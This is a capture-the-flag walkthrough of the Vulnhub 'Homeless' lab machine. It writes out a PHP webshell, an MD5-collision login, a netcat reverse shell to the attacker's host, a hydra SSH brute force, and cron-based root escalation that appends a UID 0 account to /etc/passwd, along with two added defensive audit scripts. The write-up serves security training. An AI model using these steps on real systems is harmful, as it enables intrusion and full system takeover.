homeless target machine
For personal practice only
Target information
Download: https://www.vulnhub.com/entry/homeless-1,215/
1. Host scanning
![](https://upload-images.jianshu.io/upload_images/4664072-7c93c67a0bc84784.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-1b082b55ba0bb2c4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cf787af05a0ff159.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4e068a2a53eb9912.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
In the page source and on the page itself we find a hint about the User-Agent
![](https://upload-images.jianshu.io/upload_images/4664072-a57d770750116d3f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ca1adc5ffa9b4985.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4318ea68a1d8b69d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-06a953fb830f9ea4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8ae906d6bc5407d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. Exploitation
![](https://upload-images.jianshu.io/upload_images/4664072-ca88f5b6353a0fd9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9ecf87469ffa3d9f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Put the string shown in this image, "Cyberdog Sledding Portal", into the User-Agent field
![](https://upload-images.jianshu.io/upload_images/4664072-6c0718b901a9296a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Or use the rockyou wordlist to brute-force this User-Agent value
![](https://upload-images.jianshu.io/upload_images/4664072-c4ea633ac03246b7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e0e54681b3c96765.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-851085d170aebf23.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Open that page
![](https://upload-images.jianshu.io/upload_images/4664072-a16737f6e95843f5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Upload a small webshell
![](https://upload-images.jianshu.io/upload_images/4664072-0ad9e20f85b4c2a3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-579aff151e001c02.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Uploaded command
![](https://upload-images.jianshu.io/upload_images/4664072-0cebccc0104c8aa4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```php
<?=`ls`; /* in PHP this is the short form of: <?php echo `ls`; ?> */
```
Note that these must be backticks (shell execution operator); with ordinary quotes the command is not executed.
![](https://upload-images.jianshu.io/upload_images/4664072-ef89679493edfa84.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e7ff806c25040270.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Access the files it lists
![](https://upload-images.jianshu.io/upload_images/4664072-cfc6c94886f68f3e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-80eb6da444c036a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Visit the address found in the txt file
![](https://upload-images.jianshu.io/upload_images/4664072-52e958763eaea032.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-96ecae8103f27f6e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-a006a781e7457a6d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-dba976d07fa5d19b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6cba73ecb72d5526.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The logic is that username, password and code must be pairwise different, yet their MD5 hashes must all be equal: the three POSTed parameters may not equal each other, but md5() of each must give the same value.
Searching Baidu for background
![](https://upload-images.jianshu.io/upload_images/4664072-d16718f2b50ed477.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e09e502e351df50e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```shell
sudo apt-get install libboost-all-dev
cd python-md5-collision-master
python3 gen_coll_test.py
```
![](https://upload-images.jianshu.io/upload_images/4664072-40d30697e17f3af5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Sending the files with curl
Pick three of the generated files and send them directly with curl
curl POST usage: https://ec.haxx.se/http/http-post
![](https://upload-images.jianshu.io/upload_images/4664072-47299d754ee0bf7c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Option used: `--data-urlencode` (HTTP POST data, URL encoded)
```shell
curl --data-urlencode username@out_test_000.txt --data-urlencode password@out_test_001.txt --data-urlencode code@out_test_002.txt http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/ -i
```
![](https://upload-images.jianshu.io/upload_images/4664072-f31972abd5ace020.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
We obtain a session id: eec1n77li90bsc5av8sp5k5q10
In the browser, press F12 and set the cookie to this value
Then visit
http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/admin.php and you are in the admin backend
![](https://upload-images.jianshu.io/upload_images/4664072-d77ac42f901975fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2e56e645c42c78b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Reverse shell
```shell
nc -e /bin/bash 192.168.56.129 4444
```
Then, in the shell, run
```shell
python -c 'import pty; pty.spawn("/bin/bash")'
```
![](https://upload-images.jianshu.io/upload_images/4664072-c5054b2067d2a9ba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-59ec16aa52299905.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Start from the python file
```shell
find / -type f -user downfall 2>/dev/null   # besides the home directory there is a mail file, but we cannot read it
find / -type f -group downfall 2>/dev/null  # files belonging to the downfall group
find / -type f -perm -u=s 2>/dev/null       # SUID files
```
![](https://upload-images.jianshu.io/upload_images/4664072-c117e5d298fd2233.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Brute-forcing SSH
```shell
hydra -l downfall -P /usr/share/wordlists/rockyou.txt -t 5 ssh://192.168.56.128
```
![](https://upload-images.jianshu.io/upload_images/4664072-4ebb6a899847d96d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-aa8096a9a5fc20df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```shell
ssh downfall@192.168.56.128
```
Password: secretlyinlove
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-008247d575ec64ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
A cron job runs the homeless.py script every minute; its error output is also visible
Privilege escalation, method 1
![](https://upload-images.jianshu.io/upload_images/4664072-0ca584ca9da4396f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```shell
vim /lib/logs/homeless.py
```
Modify the script
![](https://upload-images.jianshu.io/upload_images/4664072-af5ead7fca192187.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f5891af49e556ee4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Root privileges obtained
Privilege escalation, method 2
Use homeless.py directly to write to /etc/passwd
Generate the password hash
```shell
perl -e 'print crypt("HUA123",q($6$hoiLHdTI)) ."\n"'
```
Output
```
$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/
```
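Both escalation paths rest on one misconfiguration: a script that root's cron runs is writable by an unprivileged user. The following audit helper is an added example, not part of the original write-up, for checking a cron directory for exactly that condition. It assumes GNU find (`-perm /mode`) and uses constructed sample files in the test rather than the target's real /etc/cron.d.

```shell
#!/bin/sh
# Added defender-side audit helper (not from the original write-up).
# For every cron file in a directory, extract the absolute paths mentioned in
# the job lines and print those that are writable by group or others, i.e.
# scripts a non-owner could edit before root's cron executes them.
# Assumes GNU find; on BSD find use -perm +022 instead of -perm /022.
audit_cron_scripts() {
  crondir="$1"
  for cronfile in "$crondir"/*; do
    [ -f "$cronfile" ] || continue
    # drop comment lines, then pull out every absolute path token
    grep -v '^[[:space:]]*#' "$cronfile" \
      | grep -o '/[^[:space:];|&>]*' \
      | sort -u \
      | while IFS= read -r path; do
          [ -f "$path" ] || continue
          # -perm /022: any of the group-write or other-write bits set
          if [ -n "$(find "$path" -maxdepth 0 -perm /022 2>/dev/null)" ]; then
            printf '%s\n' "$path"
          fi
        done
  done
}

# Usage on a real host: audit_cron_scripts /etc/cron.d
```

Run it against /etc/cron.d (and /var/spool/cron/crontabs) after any privilege change; anything it prints should be owned by root with mode 755 or tighter, which is what would have closed both methods below.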
![](https://upload-images.jianshu.io/upload_images/4664072-1e20ca13450ac04b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Change the python file contents to
```shell
vim /lib/logs/homeless.py
```
```python
#! /usr/bin/python
# python2 syntax, matching the /usr/bin/python interpreter the cron job uses
f = open("/etc/passwd", 'a')
# append a UID 0 entry; the trailing newline keeps the next line from being glued onto this one
f.write('xiao:$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/:0:0::/root:/bin/bash\n')
f.close()
print "hello"
```
![](https://upload-images.jianshu.io/upload_images/4664072-50c11215937a20bd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-18d87acef925aebd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5e4000c28a3e9c79.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9250e1ecdddbd9ec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
A root-privileged account was created successfully
Reference: https://www.cnblogs.com/A1oe/p/12694954.html
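The trace this method leaves is easy to spot: a second UID 0 entry, and a password hash sitting in /etc/passwd instead of /etc/shadow. The following checker is an added example (not from the original write-up) that parses passwd-format text and flags those conditions; the sample data is constructed, with a placeholder hash rather than the one generated above.

```python
from typing import List, Tuple

# Constructed sample, not taken from the target: three normal entries plus
# one appended the way the cron-job method above does it (placeholder hash,
# UID 0, home /root).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
downfall:x:1000:1000:downfall,,,:/home/downfall:/bin/bash
xiao:$6$SALTSALT$PLACEHOLDERHASH:0:0::/root:/bin/bash
"""

Finding = Tuple[int, str, str]  # (line number, issue, account name or raw line)


def audit_passwd(text: str) -> List[Finding]:
    """Flag passwd entries a defender should look at twice.

    - 'malformed':      not exactly seven colon-separated fields (also what an
                        entry appended without a trailing newline looks like)
    - 'extra-uid0':     UID 0 under a name other than root
    - 'hash-in-passwd': a real hash in field 2 instead of the shadow marker
    - 'empty-password': empty field 2, i.e. login without a password
    """
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, "extra-uid0", name))
        if pw == "":
            findings.append((lineno, "empty-password", name))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((lineno, "hash-in-passwd", name))
    return findings


def main() -> None:
    for lineno, issue, what in audit_passwd(SAMPLE_PASSWD):
        print("line %d: %s: %s" % (lineno, issue, what))


if __name__ == "__main__":
    main()
```

On a live host, feed it the contents of /etc/passwd; a clean file yields no findings, and comparing the output against a known-good baseline (or pwck's) catches this escalation within the same minute the cron job fires.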